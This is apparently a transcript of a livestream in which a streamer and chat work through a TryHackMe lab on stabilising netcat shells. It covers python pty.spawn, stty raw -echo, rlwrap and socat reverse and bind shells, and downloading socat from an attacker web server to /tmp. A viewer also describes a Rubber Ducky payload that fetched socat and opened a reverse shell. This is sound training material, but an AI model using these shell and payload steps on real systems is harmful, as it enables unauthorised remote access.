Hello, everybody. How you guys doing? Hopefully, everybody's having a great week. Happy Thursday or happy Friday if you're in India, TGIF. Hope you guys are doing well. First of all, before starting anything, I just want to say a big thanks to everyone. Yeah, I'm audible. So, just want to say a big thanks to everyone because um, yesterday I wasn't feeling well, had a really bad headache. A lot of people just were happily ready to adjust with me and stuff. So I just want to say a big thanks to everyone. So today I have interesting stuff for you all. Today, let me share my screen here to show you properly. As promised, I mentioned it here too. Task 5678 of Linux privilege escalation. And I have one really interesting friend. If you guys know in the Discord, right? Two guys I want to talk about, and if you can support them, that'll be great. A big thanks to big this one, DJ Mali Boy, right? He has a Twitch channel as well. I saw some of his Figma designs and stuff, and I really think the guy is doing an amazing job. So if you can just support him, right? DJ Mali Boy. Mali. DJ Mali Boy. So great guy doing some good stuff. So if you can give him a follow, that'll be great. He's doing amazing Figma related stuff. So that's one. Second, a friend of mine, Stimulus, has created a amazing, how to say, some amazing stuff regarding what's this called? I'm losing my words right now. Regarding some of the security plus and all those stuff. So I will request him if he can send or share the chat GPT prompts he did, and maybe even bring him up on a podcast to talk about the things and stuff. So with that being said, right, give them support if you can, right? And with that being said, let's get going with our stuff. Oh wait, am I live right now? Yeah, okay, I'm available. Sweet. So yeah, let's just get going with task 5678 of what the shell. And before starting, actually, let's see if we need our virtual box. Right now, we probably don't need it. So let's get going with this. Is this one better, or you guys are okay with this? Any comments 175 or 200 if you have any? I'm going to keep it 175. It's easy to read for me, but if you want me to turn it to 200, let me know. And let's get going with this, right? Okay. So we have got all connected to a netcat shell. What next? The shell are very unstable by default, right? As you guys know, you can't do tabs, autocomplete, and all those other stuff, goody good stuff. And a lot of them, even if you do Control C or anything, those things break. One sec, actually. There's wires tangled with the mic. Okay, so as you know, when you get a reverse shell with any of the Linux CTF challenges we do, for example, pressing Control C kills the whole shell. So you have to go through the whole process. They are non-interactive, right? A lot of them don't give, for example, if you do SSH back to yourself, you won't see all the output. Another one is basically, let's say, autocomplete with the tab, right? Those are the things we deal with. So in this task, we are going to talk about those stabilization techniques, 3 big ones, and we'll go forward one by one, taking all of them. They are non-interactive and often have strange formatting errors. This is due to netcat shells really being processes running inside a terminal. So when we ask them for a terminal, it's a process running inside a terminal, rather than being bona fide terminals, which are basically terminals, more stable terminals itself. What I mean by that is, let's say if you are in a computer, right? This is your terminal, and I create I do a command, whatever it would be. Let's say what here. So here I do a command, Uh, the command could be, let's say, one sec, extra large. Command could be like cat, or even like, let's say, Python 3 HTTP server, right? Any of these type of commands, right? These are still like basically inside the, going to be running inside the terminal. What we want is a whole terminal itself. When we do our own SSH or like anything else through the terminal to get our reverse shell with the netcat, they're running inside the terminal just like these Python or cat or other commands. What we need a whole terminal, and that's what we'll be trying to get with this. Fortunately, there are many ways to stabilize netcat shells on Linux. We'll be looking at three here, three ones. Stabilization of window reverse shell tends to be significantly harder. However, the second technique that I'll be covering here is particularly useful for it. So second one will be about Windows, but first let's talk about Python. Technique number one, Python. The first technique we'll be discussing is applicable only to Linux boxes, as it will nearly always have Python installed by default, because Windows don't have Python installed by default. This is a three-stage process. Okay, and that's we'll keep our stuff here. I don't want this to be here. Three-stage process. I'll clear these work because I copy pasted yesterday, so I want to rewrite it in a good manner, and it's much more easy for whoever is looking at it for the first time, right? The first thing to do is use python-c import pty spawn bin bash. We can also use it with the RCE we found in that open source thing a couple of days ago. So first thing to do is this command, and let me do here. Amazing. So we have this. So what does this is? Which uses Python to spawn a better featured bash shell. Note that some targets may need the version of Python specified. So if you are, let's say, using if they have like both Python installed 2 and 3 different versions, then you might want to replace Python here in this one with Python 2 or 3 as required. At this point, our shell our shell will look a bit prettier, but we still won't be able to use tab autocomplete or arrow keys and control C, because arrow keys are basically through history and those type of commands, right? So let's look what exactly this does. Import this one, and this is where I will be using our good old perplexity. Explain the use of this command. Okay, let's see what it is doing. It's going through a lot of whole research every time we do it. Here. Okay. The command import pty spawn is a Python one-liner used to upgrade a basic reverse shell to a fully interactive TTY session. And TTY, if you want to know the full form, I forget all the time. Text, telephone. TTY, I will say, in basically like getting a tele typewriter. Yeah, this is the one, tele typewriter, which is like basically interactive. That's all I can say. This technique is critical in penetration testing and system administration when dealing with restricted shells obtained through vulnerabilities or reverse connections. Here is a detailed breakdown. Creates a pseudo terminal PTY. The Python PTY module spawns a virtual terminal emulator, tricking the system into thinking it's interacting with a real terminal device. So this module, pseudo terminal, spawns a virtual terminal emulator, a virtual one. Okay, thinking it's interacting with the real terminal. Okay, system, it tricks the system. Okay, that makes sense. Launches the bin bash or bin sh based on whichever we give, and job control, control C, all those things. Privilege escalation, that's our main goal, right? Web shells, which is amazing. So they are good one, even netcat. So basic usage is this. NLP4, so it gives us a whole idea. That's amazing. Hopefully that helps. And I can just put some of this information in here for anyone who wants to see. Here, I'll put this in the notes. Okay, beautiful. Now, step 2. Step 2 is export term xterm. This will give us access to term commands such as clear. So I don't know why xterm is. Term xterm, what this exactly does in the system. So we'll copy this and look more. Try pro search, no. Export term xterm sets the terminal type environment to xterm. Why it is important? When you get a shell through a reverse shell netcat or SSH. Oh, this in case I was not looking. Okay. When you get a shell through a reverse shell netcat or SSH, the shell may not know what kind of terminal you are using. Many programs like Vim, Nano, Top, and other features like color, cursor movement, and screen clearing rely on the term variable to know what capabilities your terminal supports. If term is not set or is set incorrectly, these programs may display incorrectly, fail to run at all, not recognize keyboard shortcuts. Xterm is widely supported terminal type that emulates X Windows system terminal. It supports color, cursor, blah blah blah. Most modern terminal emulators like GNOME, Console, iTerm 2, etc. are compatible with Xterm. So that's interesting. That's good to know. Okay, I'll copy this whole thing. Beautiful. And then I'll get this guy. Okay. Now the last step, step 3. Finally and most importantly, we will background the shell using Control Z. So in our first one, because of PTY, we got Control Z working. Back in our own terminal, we use STTUI raw echo FG. This does two things. First, it turns off our own terminal echo. Okay, so basically if we do our own echo, it won't work, which gives us access to tab autocompletes, the arrow keys, Control C to kill processes. It then foregrounds the shell, thus completing. So foregrounds this shell we were able to create in the first one. It brings that forward, and all the our own one are like basically suppressed, which is great. FG. This is a very common command sequence used after upgrading a reverse shell. For example, running this one to make shell more interactive and behave like a real terminal. Echo stands for set terminal and is used to change and print terminal line settings. Raw puts the terminal into raw mode. In this mode, input is sent directly to the program without being processed. Interesting. For example, special characters like Control Z are sent as is. So Control Z, instead of being a special command where kills, it just sent as Control C, basically. Raw mode, I like that. Turns off terminal's echo so that you type is not displayed back to you, which whenever we do who am I, right? There is a picture actually I have. So let's say here, right, we have export term x term. So you see everything is getting repeated. That won't be happening, which is great, right? In the who am I, if you do through terminal, it will say who am I here as well, and then display whatever has to be displayed. FG brings the most recently background job back to the foreground. Background job running the shell. Typical user flow: get a reverse shell, upgrade to TDY, background shell, fix your local terminal. Okay. Cool. Okay. Okay, I think this is good, right? Looking at this. This notes will be good for anybody who's like looking at just the notes or the blog I will be writing, or basically copy pasting this. And even for you guys too, if you go back, right, the whole netcat is there, sat, and then actually there is one missing, FG, to bring things to foreground. Remember this, right? Bring to foreground. Okay, and we can see a good image given here. Sudo nc netcat nvlp 443, which is the HTTPS one. We got that. Then we typed our Python Python command to get the bash shell. Export term xterm to get the xterm terminal, and then Control Z with sudo. Okay, this is stopped. Then ssty raw our terminal, the one on our computer. Echo is dropped, turns into raw mode, and because of Control Z, the one which was in background comes to the foreground, and we technically have a proper terminal. Note that if the shell dies, any input in your own terminal will not be visible as a result of having disabled terminal echo. To fix this, type reset. This is also important, I think. Okay. Foreground shell. Okay, this is good, I think. Technique 2. This is the one yesterday we were talking a little bit about it, and I think we need to look. I think it was, who was it? Sorry, my brain is kind of losing it. Dhaval mentioned about RL wrap, wrap. So RL wrap is a program which, in simple terms, is basically a wrapper for the terminal, right? Gives us access to history, tab, autocompletes. This is what will be useful when you are hitting with the Windows privilege escalation. Tab, autocompletion, and the arrow keys immediately upon receiving a shell. However, some natural stabilization must be utilized. RL read line. Thanks, boss. Bandit, how you doing, man? Read line wrap. Yeah, right, like wrapper, not the Eminem one. Nice to see you. How's the studying going for the certificate? It'll be nice. I want to actually look into mom's spaghetti. Hell yeah. I don't know. For the YouTube folks, talking to Benedict here in the chat in here. Mom's spaghetti. I actually love that rap. Love that rap. His palms are heavy. Weak arms. Something. His palms are heavy. Weak arms. No. How is that goes? Eminem's rap lyrics. No, not rap god. Lose yourself. That's it is. Let's see. His palms are sweaty, knees weak, arms are heavy. There's vomit on his sweater already. Mom's spaghetti. He's nervous, but not. But on the surface, he looks calm and ready to drop bombs. But he keeps on forgetting what he wrote down. The whole crowd goes so loud. He opens his mouth, but the words won't come out. He's choking. How? Everybody's joking now. The clock's run out. Time's up. Over. Plow. Snap back to reality. Oop, there goes gravity. Oop, there goes rabbit. He choked and he's so mad. But he won't give up. That's that easy. No, he won't have it. He knows I am destroying the rap. Like, I think I should not rap. Like, I'm not a good rapper, man. I'm good with Hindi raps. I can't do these ones. Nobody's taking videos about this, right? Okay, that's good. I don't want people to start taking videos about it. Okay. Don't clip this. Please do not clip this. It will haunt me for the rest of my life. Can you rap like Bandit? How good you are? No. Please do not. Please do not. Bro. Let's go back. I won't even try. we can do when we are in call. That'll be nice. Okay, let's get quick question. Bandit, what other certificates you have done? And let's say if I want to do a certificate, do you think which one is a good one? Security Plus, Pen Test Plus, OSCP? Which one should be like my first one? And I should, like, it's not about certificate. I do not want, but my company will pay, so that's a good thing. But I do not want to like look for jobs. I want to look more for like knowledge and satisfaction, because I feel first one probably something like Security Plus. Okay, but Security Plus is a lot theoretical, right? If I'm not wrong, is less practical, or am I wrong in that? CCN is a good one in journal. Oh yeah, for networking, learning about. That's a good one, 100%. So Security Plus is not great, right? Because what I learned with Security Plus, because a friend of mine did, I looked at its stuff, right? What I could tell, it is like talking about RAT, talking about what are ransomware, malware, networking, small stuff. And I was like, that's legit, is like basically pre-security things we are learning, if I'm not wrong. I just passed Security Plus, did Dawn's course. Security Plus exam focused on today's best practice of risk management and risk mitigation, includes some emphasis on practical hands-on ability to both identity and access security threats. These are like not those, but I legit had no certs for about. OSCP is okay. It's a good thing for the resume, I suppose. Yeah, like what I have heard. Yeah, I'm not a fan of like actually I will tell you this. I have a couple of cloud certifications and yo, Hartfield, what's up, bro? How you doing? Sup. So certificates, I will say this. I think people who are new to the industry wants to get inside their door, their foot inside the door. Good for them, like, because for me, when I got my certification, I realized I was like, it is more structured. You get a confidence. I got like my AZ 900 and one more certificate in cloud. My problem is certs cost too much for individuals to get, and it's terrible for people just getting into the field. 100%, I agree with that. I 100% agree. $300-400. I would rather say if there was a certification more like, hey, take our certification. You don't have to pay till you actually like get a job, but there's a proper clause that you have to tell them you get a job and then you have to pay them 400. Let's say. Yeah, I agree. The problem though I feel is a lot of HR people do the screening and looking at the certificates or resumes. So they look at a certificate and say, oh, big thing. Right? Like, I would rather love to see somebody like, if let's say I'm hiring, I would love to see majority of certificates are, yeah, that's another stupidity. Even the cloud ones is all, I have my Azure one, I think I have my AWS one as well. Nothing much. Oh, Sans is great. Sans are expensive as hell, but Sans is great. So, so whoever is like looking at this, right, wants to go in cybersecurity. I was chosen for. I was in the interview process for Fortinet antivirus analyst. I didn't go because it was in it was in Vancouver, super expensive, and I didn't want to go. Oh yeah, yeah, 100%. If you start doing TryHackMe, I think you can do a lot more. And even like what I was saying though with Fortinet, right? Their 3 months training probation period is about SANS level course you have to do. Not SANS exactly, but it's that same level. And you have to clear it to get out the probation. And that's what SANS is a big one. SANS is like you learn, and SANS is good for, I will say, security. It actually has a very good reputation. With it actually does got some stuff, right? Can you post your Discord having some real issues with Telnet exploit RN and might ask for some help here? Sure, buddy. Let me do this. And even you can ask here if you want to. This is yeah, in ask anywhere in the, feel free to ask it in the Discord. You can even DM me if you are shy. But yeah, feel free to send it. A lot of people are ready to help in that field, in that Discord. But yeah, like I would love to just, I was thinking I'll just do a certificate. Might be helpful, right? That's the only reason I was like, oh, no problem, bro. Thank you for coming. Like you guys do like what you do, coming, messaging, that helps me a lot. Like helps me mentally a lot with like, I know if people are watching me, it means a lot. So thank you for joining. I love that. Oh yeah, so SANS and stuff. So 14 I do SANS. I know that for sure. But yeah, let's get going with our terminal. RL read line wrap. RL wrap is a program which in simple terms give us access to history, tab completion and the arrow keys immediately upon receiving a shell. However, some manual stabilization must still be utilized if you want to be able to use Control C inside the shell. RL wrap is not installed by default on Kali, so first install it. Okay, let's install our RL wrap. What is that? I'm mostly doing it because CPTs is relatively cheap and I heard is better than OSCP. Wow, really? And I haven't done much pen test for 8+ years. Yeah, you were in research, so makes sense, I guess. I would love to like just work with you at one time with the research and stuff and like do some bug bounty. That'll be so fun. Well, that's good. Like I'm eagerly waiting what your thought process is with this. It'd be nice for the whole community to know from person here how was the certificate and stuff. Okay, let's install this by the time. Yeah, vulnerability research. 1 second, let's start this. Yeah, vulnerability research and attack surface management type works. Work last few years. Yeah. I think like attack surface management, and when you go into big levels, I think attack surface management and those stuff are more dominant in the management CISO side, right? You are more protecting your assets for a big company when you are in big company. Okay, so we are going to install this RL wrap. It might be coming in a bit. Oh, here it is. Okay, so let's see. Copy. Okay, so let's see what we have. Password prompt, ANSYS color aware, nice. History, help for file, all those. Good amount of options. That's interesting. Nice to know. This one I think will be very helpful with this. Oh, what is it? Oh, sorry. I'm so sorry if I pronounce your name wrong. Oh, Saldado Plitinaro. Hi, I don't speak fluently English. I have difficulties in understand our language. In the future, install OBS plugin, closed captioning. Like, oh, okay, sure. I will do that. I will do that. Sorry. Thank you for telling me, because this is how I will improve. So thank you, because what I do over the weekends, to give you guys an idea, I try to find ways how I can improve. Stimulus has been helping me a lot, so I can reach better to people. So thank you so much for this suggestion. I will actually note it down here. I'll put your name so I can. This is big for me. Oh, wrong button. Okay. Thank you, bro. Krish, how you doing? Good morning, brother. Also, Bandit, I'm building out a platform in Python and AWS to test entire external attack surface for vulnerabilities and misconfiguration. Oh, yeah. Here I am again too. Good morning, brother. Okay, Bandit. I'm building out a platform in Python and AWS to test the entire external attack surface. Okay, for vulnerabilities and okay. Oh, you were. Oh, I was. Yeah. That's interesting. So like a Nico, a Nikto, or those type, right? You are going over all the places and trying to see what all attack surfaces are, like cross-site scripting and stuff. That's amazing. That would require like a lot of good coding and recursive, I believe, right? Like knowledge. Recursion is one of the things I would love. Anybody here want to like do lead code and competitive programming with me? Actually, the reason I'm asking because I wanted to go back into learn Python fast and more. And I don't know if you guys know, I have never talked about this, I think. Oh, not AIC. Anybody know ICPC? International Collegiate Programming. So ICPC, if you guys don't know, right, is a full big worldwide coding, competitive coding platform where there a lot of times there is like competition is happening between different universities and all those teams. If you like pass this, you are basically going into top 10 companies in the world in tech. I took part in this, the Pacific area, so this was my area too. And I did actually like my team came 44 out of like 150 or something. We were going against Barclay and all those. You know the worst part about this? We solved like 7 problems and 6 were by me. One was by my other 2 teammates because they both were new to programming. Other team, there was one team who did better than us, which was had like some good smart people, and they came like 30. So if you guys, anybody wants to do that on the weekend, I won't be streaming about them. I'll be just in Discord, just doing by myself. So if you want to do it, let me know. I would love to do that this weekend. one or two lead code programs. Yeah, but actually, so if anybody wants, right, I think I can ask Benedict. We can request Benedict to give a little bit summarize CPTS, hack the box CPTS. That's certified penetration testing specialist certification. And he mentioned that it's better than OSCP. A lot of people have, he mentioned that he's seen people saying that. So, interesting stuff. Post-exploit enumeration, pivot, lateral, privilege escalation. So, that'll be nice to have that. I once saw that it is possible to do privilege escalation using Nmap tool. Really? Oh, I've never heard that. Nmap. It is one of the GTFO bins. Oh, okay. So, because it's one of the GTFO bins, it can be done. Oh, okay. This is nice to know. Nmap. So, if you don't know, GTFO bins are a big thing. Took me some time to understand this GTFO bins too, but these are basically binaries that can help you get the F out, basically, as you can see, break out of the restricted stuff. It's only like 400 USD GTA. Yeah, I love that. It's interesting. Like the best part about this community is like they are not afraid of what people will say, right? So thank you, Soldado. I'm sorry if I pronounced that name wrong. Well, that's good to know. This is actually an interesting thing. I didn't know about this. Yeah. Okay. Good chat. Good chat. I like that. Thank you so much for all the messages, though. This is very helpful in me constantly, like, as a streamer, it's very like gets lonely. So when you guys message, it is like very awesome. Like I can't thank you enough, basically. So thank you everyone for that. Okay, and let's get going with we installed the RL wrap. So let me put this in my okay, I'll put this in my notes so I can share it. Technique 2. Technique 2. Okay. So technique 2 is here. Yeah. So we have installed it. To use RL wrap, we invoke slightly different listener. RL wrap NC NVLP port. Okay, so before the NC command, we are doing NVLP port. Like before NC command, we are doing RL wrap. Pretending our netcat listener. Okay, here. Pretending our netcat listener with RL wrap gives us much more fully featured shell. This technique is particularly useful when dealing with Windows shell, which are otherwise notoriously difficult to stabilize. When dealing with a Linux target, it's possible to completely stabilize by using the same trick as in step 3 of the previous technique. Background the shell with Control Z, then use SST raw echo FG to stabilize and re-enter the shell. Okay, so basically with Linux we can stabilize, but with this technique is particularly useful when dealing with Windows shell, which are otherwise difficult. So this is, I think, I want to know, anybody here knows what RL wrap exactly does in the background? What exactly it's doing? I want to know that, like what it is commands it's running through. With okay, let me what does how does RL wrap, right? How does RL wrap helps in stabilizing the reverse shell? Explain in brief with the to read line is what gives you tab completion in shell. But like how it does that? Yeah, like I understand Bendit. It does like basically it is giving me command history. Its arrow keys are working. Control C is working. All those. But how is it doing that? Read line is the library. But what it is doing like as a library, like I think read line. Oh, this is basically giving us access to the history ones and all those. About SoCat, this tool is very good. I created an automation through a USB rubber ducky that downloaded SoCat through PowerShell and connected via reverse shell to my server. Oh, nice. Okay. So access to, yes, normal shell wouldn't have it. Oh, okay. So I think no need to this. I'll just mention because I will forget about this. No need to read this. I think you gave me the answer. But SoCat, actually, Sarlando, we are doing SoCat too. We are covering in a bit. So that'll be great. Reverse shell, normally you don't even see a command prompt. Huh. Yeah, makes sense. Yeah, like you don't see anything in that. So I understand what you're saying. It's interesting, like how many libraries are there? Just level up helps you. And let me ask you this quick question. What I'm thinking, right? And maybe everybody can help me pitch in this one. So I have SSH, like here is the server, right? The basically target server. This is the target server. I ran basically netcat in this to get, or basically I have a reverse shell coming with the netcat. I'm listening, whatever is the command. But if I do RL netcat, right, is RL wrap, I mean, RL, is it going to run any specific command in the target that can like flag my stuff? Is there going to be a command? No. So RL basically is going to utilize already existing libraries, so it won't even flag if somebody's, because RL wrap is not going to be an extra standout type process. That was my question. So no, answer is no. Interesting. That's actually okay. That's nice to think about. And it doesn't stand out, like, right? Like just to confirm, it doesn't stand out. Oh, RL wrap is running on my side. Okay. Oh, okay. That makes sense. DJ Mari Boy, what's up, bro? So everybody, I was talking about him in the start. If you can, please give this guy a follow. I saw some of his stuff about like Figma designing UX stuff. So please go through his stuff and support him. Good guy. I'll just post this here. So if you are on Twitch, please give him a follow. Means, oh, no problem, buddy. I love your work. I love the work. Not going to lie. Love the work. Alrighty. And let's get going with our, not GTFO bins, our TryHackMe privilege escalation, right? So, SoCat. And, Osando, that's actually an interesting thing you mentioned. Where it is. you use SOCAT to create like a basically created an automation through USB rubber ducky that downloaded SOCAT through PowerShell and connected via reverse shell. That's something. I actually viewing you because I love this side. I mean hacking side, which when I was a kid I used to watch Mr. Robot lots of times. So, oh yeah, 100% man. A lot of people like I started because of gaming. I think Bendit also started with like gaming, if I'm not wrong. We talked about this, and so it's interesting. Yeah, that's how good things start, right? So I'm happy I'm able to help. Oh, by the way, a new because I reached one. I don't how much I reached. 1 second. I reached 157 subscribers and now 103 followers on Twitch. So I will be doing a new giveaway. Please join the Discord. It will be basically randomized, right? So please join the Discord. I will be doing one this week. Here's the link. So everybody, you don't have to be a subscriber or anything. Just like join this. You can take part. Don't have to share anything. Just want to help people. So please do that. Okay, with that being said, let me 1 second make sure my phone I'm able to see all the messages on. And let's go with our stuff here. Okay, cool. I'm here. So let's go with our TryHackMe SOCAT. This is a big one. Yesterday also we talked about this. Technique 3 SOCAT. The third easy way to stabilize a shell is quite simply to use an initial netcat shell as a stepping stone into a more fully featured SOCAT shell. Bear in mind that this technique is limited to Linux targets, as a SOCAT shell on Windows will be no more stable than the netcat shell. Okay. To accomplish this technique of stabilization, we would first transfer a SOCAT static compiled binary, a version of the program compiled to have no dependencies, up to the target machine. Okay. Are you using WSL or you had another virtual machine, brother? Kali 2025 I'm using. So that's actually interesting. So this is okay. This is the stuff they have compiled library. A typical way to achieve this would be using a web server on the attacking machine inside the directory containing your SOCAT binary. Okay. Would be using a web server on the attacking machine inside the directory containing your SOCAT. Okay, so basically we create a web server on the attacking machine, send that to to the attacking machine, sudo python m http server 80. Then on the target machine, using the netcat shell to download the file. On Linux, this would be accomplished with curl wget my local IP address socat-o temp. Okay, this one is very interesting. For the sake of completeness, in a Windows CLI environment, the same can be done with PowerShell using either invoke web request or web request system class, depending on the version of PowerShell installed. Invoke web request URI. URI is basically URL, right? For who don't know. IP address socat.exe. Windows out file is this one where we mention the file. We will cover the syntax for sending and receiving shells with SOCAT in the upcoming task. So this is a big one. I think over the weekend I need to test this so I can give you guys more info. I have never seen SOCAT, so I heard about it but never used it. SOCAT technique 3. This one I think I have to go over on create. Yeah, that's exactly, 100%. 100%. So Osalando on YouTube said that's exactly because what he said was, I created automation through USB's rubber ducky. So rubber ducky is one of the basically those bad USB, the malware consisting USB. You click on it and then basically that will be like installed. Like you can have a keylogger installed or SOCAT installed, So that downloaded the socket through PowerShell and connected via reverse shell. So basically what he did, which is amazing, I think like that's amazing, Osalando, you did. So basically this is his computer, so attacker's computer, and this is the server. So you connected the USB to this, it downloaded the socket from your server and gave you a reverse shell back. Right, that's right, like I got it right, 100%, right, Osalando? Oh, I think there's also a lag between YouTube and stuff, so I had to fix that. Okay, and this is part. Okay. Nothing more, right? So thank you for sharing that. Means a lot. Okay. With any of the above techniques, so technique 1, 2, 3 we discussed, it's useful to be able to change your terminal TTY size. This is something that your terminal will do automatically when using a regular shell. However, it must be done manually in a reverse shell if you want to use something like text editor, which overrides everything on the screen. So first open another terminal and run sstY-a. This will give you a large stream of output. Note down the values of rows and columns. Okay, let's run this. I want to see what exactly this will do. Kali. So interesting thing. So we get like rows 28, column 196. Speed, not sure. Okay, one sec. Let's now change this to something smaller, right? You guys can see this, right? You guys can see what I'm typing. So now rows have changed from 28 to 19. Column has changed from 126 to 76. What it is doing, telling us how many rows and columns are there. Got it. Close this guy, please. Next, in your reverse shell, type stty rows and stty columns with the number, filling in the numbers you got from running the command in your own terminal. This will change the registered width and height of the terminal, thus allowing programs such as text editor, which rely on such information being accurate, to correctly open. I see. So that's interesting. I had no idea this is also we can do. This is like a extra, I think, stty. Wrong place. OBST. Extra to get rows. Do you guys do this usually when you are like reverse shelling? Like, have you done this? Calls to get your terminal grid and do stty rows and columns, right? Stty rows and columns. The reverse shell is exactly the issue I'm having with DTA. Oh, this is exactly the issue you are having with the stuff? That's interesting. Hey, that's how we learn, right? This was the exact issue you were having. That's here. It takes time. The reverse shell is exactly the issue I'm having with telnet. Nice. Okay. Yeah, let's go next. Well, wait one second. Well, not exactly, but I generated payload and set a listener and port, but I can't get reverse shell to start. Okay, sure, we can look into this. I think that will be something interesting to look into, 100%. So now, the lads, this is for you. How would you change your terminal size to have 238 columns? Please answer this. I would love to see. Hopefully, I'm able to express, like, teach people, right? So that helps me to know, right, if you answer this. And then next question is, what is the syntax of setting up a Python 3 web server on port 80? Those two things. I will say, like, let's put a 10 seconds timer. 10, 9, 8, 8, 7, 6, 5, 4, 3, 2, 1, 0. I would love to know answers, man. Teach. Okay, so here we have STTY, right? And calls for column and just the number 238. We are at 2 days tree from, and once I had 64, which is okay. What is the syntax of setting up Python 3 server? So important is port 80 HTTP server. I think it is Python 3 reverse web server. I know it has like certain parts of it. Let me think. I know it will have HTTP dot server port 80 and it should have Python in it, right? Or module. Python module. What is it? Web server Python 3-m HTTP server 18. Or sudo, this might be sudo. Sudo Python 3-m for module, I believe. Server port 80. Okay, beautiful. SOCAT. SOCAT is similar to netcat in some ways, but fundamentally different in many others. The easiest way to think about SOCAT, let me close this, is a connector between 2 points. In the interest of this room, this will essentially be a listening port and the keyboard. However, it would also be a listening port and a file, or indeed 2 listening ports. All SOCAT does is provide a link between 2 points, much like the portal gun from Portal games. What is portal gun? Oh, like when we just like Eminem has, right, in his I like one of his song when they're two, basically a portal, like a web hole, wormhole, just like the wormhole. Once again, let's start with the reverse shell. Reverse shells. As mentioned previously, the syntax for SOCAT gets a lot harder than that of netcat. Here's the syntax for a basic reverse shell listener in SOCAT. Basically, SOCAT has SOCAT TCP-L and port number with the dash at the end. Okay. Anybody, like, I know Osalando has used it. Anybody else has used like SOCAT before? It's interesting to think about, like dash at the end. As always with SOCAT, this is taking 2 points, a listening port and a standard input, and connecting them together. The resulting shell is unstable, but this will work on either Linux or Windows and is equivalent to NCNVLP with the port number. Okay. On Windows, we would use this command to connect back. So we say TCP local port, local IP, local port, execute PowerShell.exe and pipes. That's interesting. The pipes option. Let me actually put this here. So cat. Can't type. So one is this, and the other command is basically socat pipes. So first one will work on both. The second one is for Windows, if I'm not wrong. The pipes option is used to force PowerShell or command.exe to use Unix style standard input and output. Okay, so pipes is basically for to convert it into Linux. This is equivalent command. There is an equivalent command for the Linux target. So this is execute bash li. Okay. Add to dictionary, basically. Bind shells. On a Linux target, we would use the following command. Oh, sorry. On Windows target, we will use this command for our listener. So on the target, we want this port execute shell pipes. This is reverse shell. This is bind shell. What's the difference? Oh, dash shell. Dash shell is the difference. Okay. Hold up. Reverse shell. Listening shell. Okay. We use the pipes argument to interface between the Unix and Windows ways of handling input and output in a CLI environment. Regardless of the target, we use this command on our attacking machine to connect to the listening port or waiting for the listener. So this will be same as netcat. Other ones are about, this one is listener, or this one is for bind shell, this one is for reverse shell. Regardless of the target, we use this command on our attacking machine. Okay. So irrespective of the target. Interesting stuff. I think this is breaking the whole structure. Okay, now things might, nope, never mind. Okay, all good. So now let's take a look at one of the more powerful uses for socat, a fully stable Linux TTY reverse shell. This will only work when target is Linux, but is significantly more stable. As mentioned earlier, socat is incredibly versatile tool. However, the following technique is perhaps one of the most useful applications. Here is the new listener syntax. Okay. Basically listener with file tty raw echo. So it's same as like what we did with stty, right? Stable tty. Target is significantly more stable. Okay, so this one will give us stable shell, stable Linux target. Stable reverse shell. So we have socat TCP listener port file tty. So there is file here, it's execute this program, and then based on that, right? What is bash li? Is it okay, let's see. Bash li launches a new shell with two important options. Login shell. This makes bash behave as if you have logged in in a new. So it logged a new. What's a new? Oh, basically logged in again. Okay. So it reads and executes command from system-wide and user-specific login files. Okay, nice. Oh, somebody's typing. Sir, I have a question. So basically with reverse shell, we are listening on our end, right? And send the connection from target, while in the bind shell, we listen in the target system then to our machine. Okay, so let me break it down, the question. In reverse shell, we are listening in our end, right? Yes, that's correct. And in the connection from the target, while in the bind shell, we listen in the target system. Yes. Wait, hold up. And the connection from... Yes, yes. Can you give the example and use cases? Okay, I think use cases, I think let's ask Perplexity if we can get. So give when because majority of the time I have used reverse shell. I honest with you, I've never used a bind shell because I've mostly done on TryHackMe, and then it's 90% of reverse shell. Give examples when we have to use reverse shell and bind shell to a university student in detail. Also explain where is listener in each case. Okay, let's do this way. Oh, it's going in the reasoning mode. Okay, that's good. You're okay with like this, right? And maybe I can draw so it is a better answer, hopefully. Okay, here is a detailed explanation of reverse shell, including use cases. Reverse shell. The target machine initiates a connection to the attacker's machine, which is listening for, so that confirms your first one, right? For use, when target is behind a firewall blocking inbound connection. So basically, let's say if your target, let's say our target is in red. This is our target. And I'm not sure if you are familiar with the cloud and all those infrastructure. So I'll give you an idea of that. So there is a load balancer a lot of time, which also acts as like kind of a firewall because it has inbounds and outbound rooms. Inbounds means, and outbound here. Inbound means what all IP addresses or what all places can make a connection or send request to the server. Outbound is basically where all this can go, where all the connection can go to from this server. So basically, let's say if you are sending a packet, or like a best example is you used to make calls, right? Things were super expensive. Phone calls were super expensive at one point. Inbound, you could get connection. You can get a call from anywhere in the world. You don't have to pay. Incoming is free, right? So it can go inside. Outbound, you used to pay. You used to like pay, like if you're making a ISD international call or state provincial level call or local call, right? So it's the same idea. In where it is coming from, out where it is going, your connection. So what these target has is like, okay, a lot of time out is always like everywhere. Majority of the time out is everywhere. But inbound, who is able to look at this application, is the one issue. And that's what they're saying. Let's say if you want to connect, the inbound connection is like giving issues. So if you want to connect to the server, let's say, let me bring it here. So if this is the firewall, you are trying to connect, it doesn't let you. So in those cases, you want to use a reverse shell, because if this is the one sending, it's like a private connection setup. Firewall don't do anything. That's one. Let's look more. In penetration testing to bypass network restrictions, again same thing, firewall. For stealth, outbound connections are often allowed. So outbound, that's what I was saying again. Outbound is mostly everywhere, majority of the time, because let's say you have a database, right? You have a database for your company. You always set it outbound to everywhere in the world, right? Who can see the data, right? Let's say in Facebook, who can see the data? Anyone on Facebook can see the data. Who is able to change the data, or who is able to connect to the database, right? That will be only Facebook server. Why? As a user, you are making a request to the Facebook server. Facebook server has all the business logic, and then it says, oh, is this allowed or it is not allowed? If it is allowed, it goes to this, and then you can see as a user on the web page. But if it is not allowed, it doesn't let you touch. You directly cannot touch the database. One example, right? And this is, if you go into cloud, I do that all the time, honestly, right? I'm looking at what's going on connection outside, inbounds, what's going on. Mostly I'm checking the inbound. Listener portion, I have automation from both sides, but inbound is the one I have to change or work around mostly. Listener position on the target's machine. Basically, listener, NVL, this one. This is going on the listener. Wait, what? Oh, attacker starts the listener. So it's on the attacker's machine. Yes. Sorry, I was thinking of target. Target, we start the reverse shell. We get the listener, and we are listening on our own machine. Exploiting web servers, restricted inbounds, phishing attacks, same thing. Bind shell. The target machine opens a port and listens for incoming connection from attacker. So in this case, we have a server, target, right? Let's say you have a house, right? There are so many windows and doors you close to protect yourself. In outbound, it's already open, right? You are telling it to, hey, send me the information. Let's say you're talking to your girlfriend or something. In outbound, we open one, right? Opens the port and listens for incoming. So we are just listening here. It's coming in. For internal networks with no firewall restriction, for persistence. And this is what we did. So let's say if with inbound bind shell, I'm using a RCE to, I'm 